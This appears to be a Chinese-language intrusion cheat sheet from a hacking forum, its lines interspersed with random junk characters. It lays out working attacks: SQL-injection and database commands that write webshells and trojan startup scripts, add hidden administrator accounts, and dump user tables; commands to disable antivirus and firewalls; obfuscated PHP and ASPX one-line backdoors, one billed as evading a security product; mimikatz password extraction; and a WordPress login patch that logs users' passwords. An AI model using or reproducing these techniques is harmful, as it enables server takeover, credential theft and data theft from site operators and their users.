+ x, Y3 L+ O; V% O
中文版本操作系统中针对mysql添加用户完整代码:5 y5 ^3 E" f! Y; {
# P# S$ U; f" Q5 y
use test;! ?: G" c0 l6 u) `
create table a (cmd text);
\* B1 m q; j1 Finsert into a values ("set wshshell=createobject (""wscript.shell"") " );5 _! s! q6 J0 W6 } t* U: C
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
& }) h8 J5 t$ @2 r, K: Jinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
9 Q1 y0 @( W' `( Y. x: _: dselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";/ y5 h( U8 m% z$ r f1 d2 W- W
drop table a;
' q$ m4 j% U2 c, d2 a& E0 ?3 ]: }8 O+ H1 B
英文版本:
2 L8 L) @" {/ d( C4 n
+ r; _2 B& w! v$ c0 _6 zuse test;
0 p# p6 Z2 m" N0 l# screate table a (cmd text);* _0 D! U3 T J
insert into a values ("set wshshell=createobject (""wscript.shell"") " );/ f' X3 f+ M7 I
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
1 Z$ d2 }1 Y' m0 K- Zinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
2 d* M2 U! I! P- n9 W* t" ]select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
1 V' q9 _- M6 C) d" qdrop table a;
7 s9 y. K T* `% v
- ?( M/ ?4 k! z4 Zcreate table a (cmd BLOB);( a' y# {) J! M" ?
insert into a values (CONVERT(木马的16进制代码,CHAR));
( f' w8 S, V9 U7 J: t+ Nselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
* f" F( V/ u! l, Xdrop table a;9 g( M% S( `; Q8 i# }
0 P; e0 p# h3 x5 v9 e2 q6 ]
记录一下怎么处理变态诺顿% {( V8 q& A+ g8 y# b6 y1 R0 _
查看诺顿服务的路径 s2 ?, t$ V- F
sc qc ccSetMgr
& B3 x$ N# ]( S- G! v5 A然后设置权限拒绝访问。做绝一点。。
8 o/ ?$ e. i+ Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system7 ^% L& E9 ]6 ?& k7 h
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"; {4 T5 ]' g3 H8 Q1 d& P
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
' ]+ v6 m+ { x1 \* Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
; K& Z; @; F9 d
& d: i% w3 A2 k* q8 f然后再重启服务器
" [: c& v- @/ j: Eiisreset /reboot: N( F( F, v6 j$ |& t2 ]8 e2 H$ S
这样就搞定了。。不过完事后。记得恢复权限。。。。$ d# s/ F. c- |- V; X
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
/ w1 l" R5 s: Z7 g% c6 g" pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
: o# j$ l( K" R+ p, Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
4 _2 O/ o" F0 A. L, Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F( D, M7 m4 ^0 ~% Q/ R! q+ {
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
2 ~5 g- v5 P+ F$ |$ ~( h, i5 ]% L: Y4 n8 a
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user'''): _* k/ B/ C" G( l: i
* B9 N( l* B4 o/ H4 d3 r: mpostgresql注射的一些东西- P N* i; S t. \0 S0 x4 v
如何获得webshell2 A; ^' \% S! {
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
9 g9 O$ V/ P' ]' Uhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
; X! ^2 P4 C: R; H: J' o, ^0 y8 p( x/ phttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
2 }: z- _$ r+ V1 f* A; x% E如何读文件4 Q0 c* C" Q n
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);2 i5 ]2 B% w5 |! [) m0 `
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;' {1 q; g4 N$ `0 `) K
http://127.0.0.1/postgresql.php?id=1;select * from myfile; f6 |* Z8 ^* r+ V% J& x
" t+ ^( l) _* F5 h4 R8 [
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
: ?& s0 `' ~( L; B6 A) Z6 \7 _ _当然,这些的postgresql的数据库版本必须大于8.X
6 |8 ]2 u1 y) { W0 t. S创建一个system的函数:! F# R/ _: Y; q/ O
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
/ |9 u1 h4 e" J( F0 |) B: M
, c3 G3 J) m5 P8 d6 ]创建一个输出表:- l( Y2 I4 a, j D, m9 t3 a9 k. X8 h
CREATE TABLE stdout(id serial, system_out text)
3 F) j7 o3 M( p. Q3 W) B
2 K) _! r& `$ H. l b执行shell,输出到输出表内:
) q0 l- H( b: z# y! f* g! USELECT system('uname -a > /tmp/test')
5 ?% H; P+ g! O! s. u9 i2 a' U, }5 Y0 O7 v
copy 输出的内容到表里面;
3 o! L) u. C1 HCOPY stdout(system_out) FROM '/tmp/test'; {9 Y% g- l' ~: \) h4 h
3 Z, ~, q7 @" C. y) H
从输出表内读取执行后的回显,判断是否执行成功. n5 h& k" C3 l7 w8 R
( m; ~* O; Z1 D4 i8 f. TSELECT system_out FROM stdout4 }1 D- r4 c2 e( |7 J
下面是测试例子
7 f, m' ~& m g1 K
, M2 h& r* y4 r: T5 \ A7 K$ x/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
8 x! \) B# t/ } `9 U G8 Y+ l6 I- W- ]+ n c" }+ c, H
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
1 U: t8 I5 r; [STRICT --) ]5 _* o( s) F/ |
( e) e+ F. E9 h) M P/store.php?id=1; SELECT system('uname -a > /tmp/test') --
- _2 i* v& k3 r
( V* w. z' u3 F. I/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
3 [4 M- J N" {, T) u, W; O5 A$ g' F. C2 l
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--& y) F& X7 {1 f) w6 Q' n/ U
net stop sharedaccess stop the default firewall& L. B% ~' F2 `5 S7 j8 w8 a, }
netsh firewall show show/config default firewall2 h% X. q- z8 ?0 ] V
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall# ^& `; {# ^' M1 J
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
; s4 b4 I2 \2 Z) L修改3389端口方法(修改后不易被扫出)0 s9 j# s, f. F D
修改服务器端的端口设置,注册表有2个地方需要修改
# d' j$ z6 q, k4 m. ]6 a1 R; s* b
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]0 U+ l% ?: `2 a' B' ^) ?' y
PortNumber值,默认是3389,修改成所希望的端口,比如6000
4 i7 E8 L$ K) t4 j3 Q3 O% }+ G$ G$ i( m; D
第二个地方:
& J! D' s5 S9 ~8 K' P[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
9 x& c0 I3 d @; Z6 O& SPortNumber值,默认是3389,修改成所希望的端口,比如6000
2 O7 d1 t3 |* J; h ]7 ]# [: W @4 t* l2 {
现在这样就可以了。重启系统就可以了
" G4 l$ d8 A \; ~2 [) r5 q- q* p O( Z
查看3389远程登录的脚本
" S0 w$ J9 P* G0 N* r保存为一个bat文件
7 r9 Z% \ K+ F' T$ W Qdate /t >>D:\sec\TSlog\ts.log8 h0 `9 A$ u9 b2 l2 B2 S! o* f
time /t >>D:\sec\TSlog\ts.log
. n: G( T _! j! h5 S$ znetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log9 z$ \ u* D4 }0 Q$ s
start Explorer
" F9 @, ^& E, F. p5 t2 e
4 w4 D8 a- u4 @mstsc的参数:
0 t1 ] `; {' u- x8 ?; R6 I) B2 j1 d( E5 l* s$ b3 I4 X$ J
远程桌面连接; u9 z% h' L( S$ ]3 }1 Q) ]
& X/ [) _' F3 PMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
8 ]* u6 C* B+ ^0 C5 U: | [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?7 m( \8 E# E. D3 I" ?
_2 n3 q9 R% a# s<Connection File> -- 指定连接的 .rdp 文件的名称。6 O; N0 Z: V# n: g" w7 e `7 F
0 U8 Y& u! g. t$ x, u5 p, Z' ]- |% Q/v:<server[:port]> -- 指定要连接到的终端服务器。$ x( H- S. \! g: e& S" D
. ~0 J9 c" s4 s2 W/console -- 连接到服务器的控制台会话。7 o; X: a v- |
3 d9 {9 _. H4 Z: `
/f -- 以全屏模式启动客户端。
- R+ T5 y; h" m) X- Y; {$ j9 U- r* ^( c0 H" |3 ^6 A& e# g
/w:<width> -- 指定远程桌面屏幕的宽度。
/ M D2 Z! `! G+ [# H* ~* b9 j% s% ~# M9 E; _
/h:<height> -- 指定远程桌面屏幕的高度。' G3 n7 ^# K2 I8 }) E
- ~% l, W' ~$ D
/edit -- 打开指定的 .rdp 文件来编辑。
1 H0 F4 e* Q$ Z0 k3 d( _. U) i0 P2 j: h1 M5 i0 T9 F( d- H
/migrate -- 将客户端连接管理器创建的旧版) N7 C- N3 e/ L3 n" N: ~5 D1 Q# E
连接文件迁移到新的 .rdp 连接文件。4 g0 i( S2 n# I4 `4 ^5 d
4 D7 ~+ X, |! O7 s; w' v, f+ S
& e" s, a; l. Y! f3 p* d其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
" m/ m8 R3 U9 h8 }mstsc /console /v:124.42.126.xxx 突破终端访问限制数量! A' M [0 V3 `; K" W+ U
% V& A4 R* [0 j. c
命令行下开启3389' l- i% [0 Q4 G# ]
net user asp.net aspnet /add
9 X+ v1 j, S$ H' Onet localgroup Administrators asp.net /add$ ~- Q# O2 P) i- S0 [
net localgroup "Remote Desktop Users" asp.net /add6 A- c8 x! [$ Q
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D9 o- T, j4 ^8 @1 [
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
3 [- f% h4 y: F2 Decho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 12 A: d: m: G4 j: H; {
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
) ^& x# r3 ]$ \( B: `! lsc config rasman start= auto
; i, P9 }, \. q7 ?, csc config remoteaccess start= auto
5 l" W% d' g+ _( J( Snet start rasman( l$ C" S7 R, ~" K6 c' G5 E
net start remoteaccess
4 W& ]2 Z) k5 S I+ }: d/ O! uMedia, c. n5 T6 K8 M& \: ]: U
<form id="frmUpload" enctype="multipart/form-data"+ S3 d5 U$ Z& |+ o, i2 l
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
6 Y$ ~. `% X% f<input type="file" name="NewFile" size="50"><br>
]: a* `$ t: R4 m+ x4 T; F<input id="btnUpload" type="submit" value="Upload">
2 s2 V& W6 r! O! ^+ Z. V</form>
7 U& h* P/ z# H- W% b- M/ A
( h- r1 j. e2 N; m7 Z% a6 @) \control userpasswords2 查看用户的密码
! H$ W9 `0 d y: D" `- Y+ G: aaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径" k, o8 U$ ]& ~# Z) I% g
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a5 v& U+ T; U5 J" B3 m
. \. D$ a. M0 W Z; m) j
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:! \3 q" q+ c) C. n+ _* O
测试1:) R% |; v6 p4 C6 p
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
" B6 {8 h" Z8 B% d* ?, M; d
7 U* l9 I0 u; t5 d8 ~- d c6 ~; W9 Y# j测试2:
7 W" B! | j8 I( a5 j" ]6 E4 Y# F/ J( t, y! Z; y4 a7 Q9 s
create table dirs(paths varchar(100),paths1 varchar(100), id int). ~0 u- ?2 F1 o0 I8 y8 m
$ f2 Z( y: e2 T `delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
6 b& Y/ m8 z- E& Z% }- q& a, W1 _* l( q- J
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
! z9 E+ Q$ i6 f H关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令" `' P4 x! i, ~/ N9 H
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
9 z# K6 }- d! a! ]' b, Enet stop mcafeeframework
% h4 k, J! c8 _" l" Pnet stop mcshield
4 s% i: ?5 U+ r' p) t+ Hnet stop mcafeeengineservice3 P: p% p2 j$ R' ]! k2 J! |
net stop mctaskmanager# T9 a" ^# f; Z) B! B& h
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
) y8 d% p; O- `, F( n
; Z; I5 C* C% K( n5 P VNCDump.zip (4.76 KB, 下载次数: 1)
8 \2 B7 a6 \' v4 t0 |密码在线破解http://tools88.com/safe/vnc.php4 O2 b* O+ N& L8 u+ L# s# t
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
* l2 t2 W' ]+ ^" S2 _+ V
+ a5 s) c! B& {1 H! {0 R2 O. _( cexec master..xp_cmdshell 'net user'$ ]. @, \0 v; A" b$ y
mssql执行命令。
% B+ d, `8 Q& B1 a获取mssql的密码hash查询
2 N- `9 ~7 \# E# E2 c6 F9 q" ^select name,password from master.dbo.sysxlogins
( `" ? W! X2 k' w* ^9 B+ ^ u1 H# G9 ]+ z& g- t5 E
backup log dbName with NO_LOG;
7 y4 j, ?; \. ]5 y, r/ ~backup log dbName with TRUNCATE_ONLY;, F: F' K# ^# v8 w a
DBCC SHRINKDATABASE(dbName);
: i& y0 v3 d% y5 p; Amssql数据库压缩9 v; w0 b# }# B, O! ? A; ^
) ^ ^( h2 s* {Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
7 L( p# A. F8 |1 `将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
* t) _2 X! |" a1 W0 S" R" {# a& J: e) [" z0 q
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
$ q8 r( U4 R7 u* ~" J4 _. Z$ p备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
+ o' s. e3 ~5 _* _3 f( w$ F) d5 E1 E# ~7 @
Discuz!nt35渗透要点:
: U `9 {* u: {) }4 w(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default3 {- j! v7 ?6 w% |
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
# |( @# Y: K- h6 \& t(3)保存。
5 [8 j, D8 W2 m9 B2 {& j% s(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
; U" c0 ^2 x# l# |. J( v) f; vd:\rar.exe a -r d:\1.rar d:\website\
1 r! J/ |/ A- O' b( R" [! x) a递归压缩website
. K5 H6 t" k# Y' D. c. J2 {注意rar.exe的路径
; {/ ]! r3 w7 ~# Q2 B+ K5 O0 `
/ z: @- G. }" d I6 u& N* _% W5 ]<?php
; }2 F3 O) ~& b6 b0 U
1 u0 d! Z" m! W7 X2 u' p+ M y6 C$telok = "0${@eval($_POST[xxoo])}"; a& s& ?3 x8 C! Y
9 R7 |* ?& M, X. h5 K b$username = "123456";3 |* y4 g6 l7 t9 h
7 M- _+ T e9 B3 @2 l$userpwd = "123456";2 e" d A, v2 Y% r5 a: f2 b9 ?
8 D, Y7 |+ m( o2 }3 |0 |
$telhao = "123456";
V- Q, i6 m9 {5 ^
* d4 z; L% o* r; Q$telinfo = "123456";) F. J8 p# m4 w$ a! E: m7 Q! Q
' w6 {# F5 ^) y
?>
; O/ }' s2 i# zphp一句话未过滤插入一句话木马
9 Z! V% v# Y0 R1 f5 B i3 U) p5 m1 P* X, W# |
站库分离脱裤技巧
- h% W! u: F5 m9 |4 r5 s# k3 a- ?exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
# e9 Q8 a1 ]: G) \# Q9 ?- ]exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
' j: ?7 n; A4 e) p* m条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
) I5 v+ Y \0 e0 |7 s- a/ F这儿利用的是马儿的专家模式(自己写代码)。# c C( o3 E3 }1 J# m; ]0 a
ini_set('display_errors', 1);
' x: q2 C G4 Q, ?/ `2 w' kset_time_limit(0);3 I6 T$ B& w6 q0 X p
error_reporting(E_ALL);' ~ l( k$ B9 |1 K5 J
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());" m* T" P- B' _; n2 b9 h: T3 z5 \
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
; B7 i3 b: a3 D8 F( y3 G$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());; Q2 L3 D7 t# B( }( @5 \0 W
$i = 0;1 ~* s9 |1 Z4 M* x) ]8 o& p
$tmp = '';
1 l4 U K3 T* ~( Q" W+ a! T* Iwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
7 g3 F, q; G% C* U7 z $i = $i+1;3 s* {' o( U% B
$tmp .= implode("::", $row)."\n";9 Z# q3 S4 p5 w) _ A, _5 ?
if(!($i%500)){//500条写入一个文件
( V. x, l2 d' L) O0 s $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
( C' ]/ j: S( \4 n0 j7 M1 i file_put_contents($filename,$tmp);
# ?0 l. d4 [- q: H6 r+ E $tmp = '';
. p* T4 I! }2 t+ ?. f8 r! c }; a# u& I) P1 Y& Y' {: j7 G
}& w0 l/ V4 g# h. i( m( q9 D0 U, H
mysql_free_result($result);9 Q( z+ E% X/ m0 U1 F$ K
1 Z8 K8 \( B8 P5 ]4 ?
3 |9 K/ q! `6 \! G" K) S
" r0 {' {" h/ e$ @0 y8 p7 \+ b//down完后delete j/ e m/ o2 F
# y2 K5 V3 A5 S+ {6 N
) c* B1 Y# G7 U5 N) W$ [% hini_set('display_errors', 1);+ \" ^' M4 h0 T( F8 R" |
error_reporting(E_ALL);
6 x$ z4 ~: G4 ]. ~. l# \+ _& J4 N, M$i = 0;- [7 a, ~7 ~% [, S% w% k+ [& M
while($i<32) {
: p$ K0 R* S+ \% r $i = $i+1;: W# P' b4 w1 Y6 Z
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';8 z- J' R7 u/ M* ~9 ^2 r
unlink($filename);
! |- n+ R& ], v& J r: Q}
% R+ @/ R3 m- L: W+ Qhttprint 收集操作系统指纹( n' B8 { m# `/ ?
扫描192.168.1.100的所有端口
: G y* G! I7 N& ]! Q& G; D2 ]nmap –PN –sT –sV –p0-65535 192.168.1.100; |: |9 G- L8 g6 e3 q1 J! F
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
" `: m: I3 s- i+ |# K2 Q1 ~! {* Mhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
0 B- q, Z% _$ W: X7 H$ ]Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
3 h/ |: O; ~/ i+ \( h- u' R' N
5 R& D( b" G d- c& ~5 JDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)1 o5 T+ }/ Y# J& @
4 O( J3 p; @0 V5 H) p MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
/ I b: Z6 \. K4 O& s! @- E0 g. A5 [9 h7 d7 {, X
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x h' E( A' N! c
1 M* V8 D: z2 r5 I DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
! ]8 R: d. n5 E* {
& j0 K8 L9 e- @% L0 N6 d! U6 |/ t http://net-square.com/msnpawn/index.shtml (要求安装)
# C& n" K4 l' {; ~3 l9 z9 P6 h" ~) t1 B
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
& b- n% U' Q o5 o4 `/ s+ m6 j8 G( x+ b1 N6 q' r" {/ h
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
) h1 c( _7 Q0 _4 x2 ?2 Nset names gb2312
1 H- \3 |, U( X' t) d+ }& y5 ~1 w导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
5 e& L |6 G. e2 e% k) y& ~- \6 L4 H: x$ S% T$ Z9 [- a+ {2 @7 S
mysql 密码修改) q0 g1 }5 |: X2 `& I
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
" }6 J6 Z5 D7 F- y2 |# Kupdate user set password=PASSWORD('antian365.com') where user='root';7 j1 V5 b8 I9 ^+ j
flush privileges;
6 o! Z. N: v* f% H: R高级的PHP一句话木马后门
1 M* X% l9 J( F4 q. b
0 q5 S/ M* ^2 |9 q) Z% m9 r5 F9 J* _入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀( Z! D; v' i. X- B3 u& `3 a
4 {3 n9 w6 q: ~0 e% C( x' \
1、: z- O8 n7 }: K' n( q' [
- `% i2 r. |9 `2 ]3 |" h
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$ T' _* y8 ?# r% C" j8 M
7 o$ z/ e: F# N9 o2 o" A$hh("/[discuz]/e",$_POST['h'],"Access");' R/ g( V. G5 r; p
; y# W1 t- A4 X5 H% c
//菜刀一句话5 ?/ S; j8 ?! D9 J. q
( W9 n( o1 U- A$ z1 ?8 D2、
( y! G' @& k& h7 |: X5 P1 B9 y. \; \4 N1 E4 m1 E+ b" b
$filename=$_GET['xbid']; t/ ]. Y& P( U) B& H" S7 ^+ E6 F
/ _7 H, I9 X! [! R0 O! L
include ($filename);
" p- E: N$ a( \; I2 G B
9 |! L* R; j* B; Q' r# P( _; O7 b//危险的include函数,直接编译任何文件为php格式运行
! i& D4 }: Y& \+ d7 o: Z
# e7 t% O+ H6 t6 T! q3、& c% N6 @1 U+ b0 W$ b
5 l3 \9 d4 v; i* c& E$reg="c"."o"."p"."y";, `7 l% L E' o, R! h: G9 x0 R
4 a& A# ]# X7 h" \8 N! D6 l$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);' B: h0 o/ z% B& M# |7 J
" z* ^' R) Q6 s1 o4 e7 U& T
//重命名任何文件
?' t; I: K2 w& J5 r, _
; a1 g; r7 `3 U, v8 n) ^0 Q9 p, l4、
+ S1 y4 w( R+ e, H* M' s6 E
j9 [( A& |: |+ _$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
8 a J8 C0 Y5 c/ x; k/ E" v) Z- x
: {& m1 G, L$ F, Z+ C! o/ P( f$gzid("/[discuz]/e",$_POST['h'],"Access");
! W1 ?$ Z( w+ i/ L
5 Z+ z# I7 \- J4 F c//菜刀一句话* I6 M! i5 y: P2 X
% i0 l% U( {; ?& s* ?' `+ T* Z
5、include ($uid);" z1 U# L& k/ o, N% {& ?7 r; M
, K8 s2 S$ u4 ?' f& N0 b8 S: u//危险的include函数,直接编译任何文件为php格式运行,POST
3 T- t5 {+ G5 i
( P$ S5 d* s) O" q1 \! `
9 r8 j/ a- b: D9 v$ \//gif插一句话$ e9 E" i" k2 \6 t l9 X$ a
3 o( V, p6 R+ H! Z% W1 ^' p
6、典型一句话
4 x0 H+ U/ o9 l- P. m) T! W0 L" s D' q3 j
程序后门代码1 T: E5 d( K' A: U$ j% q, z5 ~, W
<?php eval_r($_POST[sb])?>1 z# t9 v' W8 v1 O; S# ^! \2 ?
程序代码3 a+ T) u( _, B8 c$ M
<?php @eval_r($_POST[sb])?>; F) z" B; V; K
//容错代码8 `* N$ [2 c# n& ^# b+ x
程序代码
- M& P" U& i, i# Q6 B9 L' E/ T<?php assert($_POST[sb]);?>
8 h) I$ z. n3 H# P//使用lanker一句话客户端的专家模式执行相关的php语句" t7 e% R# q- _) T' W$ p* A7 p2 e
程序代码 ^2 Y; \3 f) m4 o+ O+ b
<?$_POST['sa']($_POST['sb']);?>3 _0 b- h( ?2 F
程序代码6 K# ~3 J( C3 C6 l# V$ u) h& ^7 a
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
# G+ j- a1 [# j. J程序代码2 X! Z2 N) O! b( Z, b
<?php- |- Q" G2 d) W/ J# X1 J ?4 H
@preg_replace("/[email]/e",$_POST['h'],"error");
% d1 [- I$ }( b& B?>
- R; }' i7 _- `; V8 |2 L5 k2 T7 `//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
' v, t. E3 v: k, y& ^, H. _1 u程序代码/ S( y5 b) f6 t/ E7 S1 l' l
<O>h=@eval_r($_POST[c]);</O>* p; S; v% `5 i$ Q0 m! J2 O( _
程序代码
( `% U* k. V. @7 B I<script language="php">@eval_r($_POST[sb])</script>- J/ d9 a/ E; h: `! C/ n
//绕过<?限制的一句话# Q( c. Q6 ]3 a, m* K1 U( @$ w" {; `
) ~, N7 p: [8 F0 f( h% d* p
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip- [& ?8 j1 w! l: x; E" J& C
详细用法:6 }0 e! d+ [( W; ^7 @. m: U
1、到tools目录。psexec \\127.0.0.1 cmd
V" d* n7 p7 p, b+ ?' C' l2、执行mimikatz
$ D- G& Q- K. L. s3 ^$ F- Y1 q' D" d* L- s3、执行 privilege::debug
/ V: Q7 l a9 t, \& ^2 Z4、执行 inject::process lsass.exe sekurlsa.dll4 c0 |, e1 Y) G t
5、执行@getLogonPasswords! l9 ^! c: H6 p" v0 Q6 S
6、widget就是密码
- p, N+ P1 s. ^) z/ k; h7、exit退出,不要直接关闭否则系统会崩溃。
& @4 s& L) q: J% D- j4 v2 r) x G, ? u) G, G
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
7 a$ v, m) [# t' L( a* m0 i a
5 S) F7 _/ P7 v9 B0 t自动查找系统高危补丁, e1 ]3 g+ h8 P/ V8 o* @: e1 X- p7 @
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt- s A( |# k5 y) a- X/ l; Q; S
3 }9 I; |: q6 v5 n0 R# r
突破安全狗的一句话aspx后门
! H8 _* @6 _& }<%@ Page Language="C#" ValidateRequest="false" %>3 x( C8 b P. i3 y6 ?! j j2 M4 |
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>; `, e# A. c# \6 B( E, R
webshell下记录WordPress登陆密码
' n0 U! G2 D7 Z" k# _webshell下记录Wordpress登陆密码方便进一步社工
n7 x6 B* ~' n在文件wp-login.php中539行处添加:! I# ?: K! J* @ j5 m7 L
// log password
. |, @; `7 b1 G$log_user=$_POST['log'];4 M, Q$ B2 x0 E5 S4 U
$log_pwd=$_POST['pwd'];: a, ~; b4 n% w
$log_ip=$_SERVER["REMOTE_ADDR"];
! [' ]8 Z# ~ Q% x$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
0 ~+ g! a3 b; p! T$ Y) F$txt=$txt.”\r\n”;! Q0 V4 N) p1 r' W8 u1 }
if($log_user&&$log_pwd&&$log_ip){
- D2 G" }* B1 D@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
+ J( a5 a* a9 H3 o7 {, G+ |: @}( w4 P$ T% V3 r- R
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。. b4 N6 f* [) `2 ]+ C4 m: T0 K; ~
就是搜索case ‘login’
